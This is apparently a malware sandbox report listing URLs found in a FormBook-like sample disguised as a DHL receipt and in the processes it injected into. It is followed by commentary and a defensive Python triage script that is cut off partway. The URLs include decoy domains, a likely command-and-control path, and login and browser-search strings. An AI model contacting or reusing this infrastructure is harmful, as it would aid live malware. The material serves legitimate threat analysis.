                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.beeswaxwraps.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=327371336423
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainathlete.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bubblewash.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chalouzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chaquzhibo.net
                Source: CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chicka.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chunlangzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chunyanzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.conceptartist.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.countrychic.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cryptomastery.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.douaizhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.doudouzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.duoxiuzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ecschool.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.feizhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.financialfree.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fixback.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fragmenta.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.globalheritage.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gnag.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guotangzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.homedreams.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huoyazhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.idtec.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.indotex.net/binding
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.investimo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jiujiuzhibo.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ladance.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.laxiuzhibo.net/binding
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lekezhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lifediet.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.linglingzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liufangzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luckydoge.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luolizhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxbrand.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lvmuzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.magnis.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.majiaozhibo.net
Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmp
String found in binary or memory:
http://www.mamaizhibo.com
http://www.mangguozhibo.net
http://www.mengdiezhibo.com
http://www.miaoxizhibo.net
http://www.mierzhibo.com
http://www.mierzhibo.net
http://www.milianzhibo.net
http://www.mishizhibo.net
http://www.motoaction.net
http://www.mynewchurch.net
http://www.nadabrahma.net
http://www.naikuaizhibo.com
http://www.nvdizhibo.net
http://www.nvdizhibo.net/binding
http://www.oneculture.net
http://www.onepacific.net
http://www.perfectfloor.net
http://www.perioimplants.net
http://www.pharco.net
http://www.qilinzhibo.net
http://www.qinglaizhibo.net
http://www.qiushuizhibo.net
http://www.roverclub.net
http://www.rsbi.net
http://www.salesa.net
http://www.sencare.net
http://www.spacebuilders.net
http://www.stayplus.net
http://www.summergames.net
http://www.supercanal.net
http://www.swisshemp.net
http://www.taffix.net/binding
http://www.taquzhibo.net
http://www.taquzhibo.net/binding
http://www.thebossclub.net
http://www.theflowerpot.net
http://www.thisit.net
http://www.urbanscout.net
http://www.wanyuezhibo.net
http://www.wuhaozhibo.net
http://www.wuyezhibo.net
http://www.xianglizhibo.net
http://www.xiaokongzhibo.net
http://www.xiaoyingzhibo.net
http://www.xingyezhibo.net
http://www.xishizhibo.com
http://www.xiuchangzhibo.com
http://www.xiulizhibo.net
http://www.xiumozhibo.net
http://www.xiupazhibo.net
http://www.xiyezhibo.net
http://www.xuetuzhibo.com
http://www.yecaozhibo.com
http://www.yechuizhibo.com
http://www.yewuzhibo.net
http://www.yueguangzhibo.net
http://www.yumba.net
http://www.yundouzhibo.com
http://www.yundouzhibo.net
http://www.yurenzhibo.net
http://www.zeeshop.net
https://beian.miit.gov.cn/#/Integrated/index
https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
https://push.zhanzhang.baidu.com/push.js
https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
https://white.anva.org.cn/
https://www.12377.cn/
https://zz.bdstatic.com/linksubmit/push.js
https://zzlz.gsxt.gov.cn/

Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory:
http://www.sajatypeworks.com
http://www.sakkal.com
http://www.sandoll.co.kr
http://www.tiro.com
http://www.typography.netD
http://www.urwpp.deDPlease
http://www.zhongyicts.com.cn

Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1852594853.0000000005F64000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
http://www.sakkal.comx;

Source: CLaoxM16clnn.exe, 00000015.00000002.4209611684.0000000005035000.00000040.80000000.00040000.00000000.sdmp
String found in binary or memory:
http://www.spacewalker.app
http://www.spacewalker.app/j7xf/

Source: CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmp
String found in binary or memory:
http://www.workandhealth.net

Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
https://ac.ecosia.org/autocomplete?q=
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
https://duckduckgo.com/ac/?q=
https://duckduckgo.com/chrome_newtab
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
https://www.ecosia.org/newtab/
https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005AE2000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003A42000.00000004.00000001.00040000.00000000.sdmp
String found in binary or memory:
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css

Source: EhStorAuthn.exe, 00000013.00000002.4208812041.000000000549A000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.00000000033FA000.00000004.00000001.00040000.00000000.sdmp
String found in binary or memory:
https://error.skycloud.tw/system/error?code=400

Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000297D000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4207261427.0000000002957000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:

Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000297D000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live

Source: EhStorAuthn.exe, 00000013.00000002.4207261427.0000000002957000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
https://login.live.com/oauth20_desktop.srf?lc=1033
https://login.live.com/oauth20_desktop.srflc=1033
https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.

Source: EhStorAuthn.exe, 00000013.00000003.2175842527.00000000078EA000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l

Source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
String found in binary or memory:
https://www.chiark.greenend.org.uk/~sgtatham/putty/0
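The string findings above carry more signal than a flat IOC dump if you keep track of where each URL was found. The same host can sit in the initial .NET loader's memory, in a read/write data region of the injected EhStorAuthn.exe and CLaoxM16clnn.exe processes, or in an executable (RWX) region, and that context changes what it means: the font-vendor URLs seen only in DHL AWB Receipt_pdf.bat.exe (sakkal.com, tiro.com, urwpp.de, sandoll.co.kr and the like) are metadata from embedded fonts, and FormBook is known to ship a long list of decoy domains alongside its real C2, so pushing every .net/.com host above to a blocklist wholesale would mostly produce noise. The script below is an added example, not Joe Sandbox code and not anything taken from the sample: it parses rows in the page's own format, records which process and region type held each URL, and ranks hosts. It assumes that the fifth dotted field of a Joe Sandbox dump id is the page protection of the dumped region (0x40 = PAGE_EXECUTE_READWRITE); the six sample rows are copied from the report, and the ranking rules are this example's own heuristics, not a FormBook signature.

```python
"""Triage Joe Sandbox "String found in binary or memory" rows by where each URL
was found.  Added example for this report page, not Joe Sandbox code.

Assumption about dump ids: in
00000015.00000002.4209611684.0000000005035000.00000040.80000000.00040000.00000000.sdmp
the fields read pid . phase . id . base . page protection . ..., so the fifth
field (0x40 here) is the Win32 protection of the dumped region.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

PAGE_EXECUTE_READWRITE = 0x40

# Constructed sample: six rows copied from the report above, each as one line
# with the Source and description columns run together as the page renders them.
SAMPLE_LINES = [
    "Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, "
    "EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, "
    "CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.mamaizhibo.com",
    "Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, "
    "EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, "
    "CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.taffix.net/binding",
    "Source: CLaoxM16clnn.exe, 00000015.00000002.4209611684.0000000005035000.00000040.80000000.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.spacewalker.app/j7xf/",
    "Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmp"
    "String found in binary or memory: http://www.sakkal.com",
    "Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr"
    "String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0",
]

# Accepts the fused form above and a "Source: ... | String found ..." form.
ROW_RE = re.compile(
    r"^Source:\s*(?P<sources>.+?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$"
)
DUMP_RE = re.compile(
    r"^[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}\.(?P<protect>[0-9A-Fa-f]{8})\."
)


def dump_protect(dump_id):
    """Page protection encoded in a dump id (see module docstring), or None."""
    m = DUMP_RE.match(dump_id)
    return int(m.group("protect"), 16) if m else None


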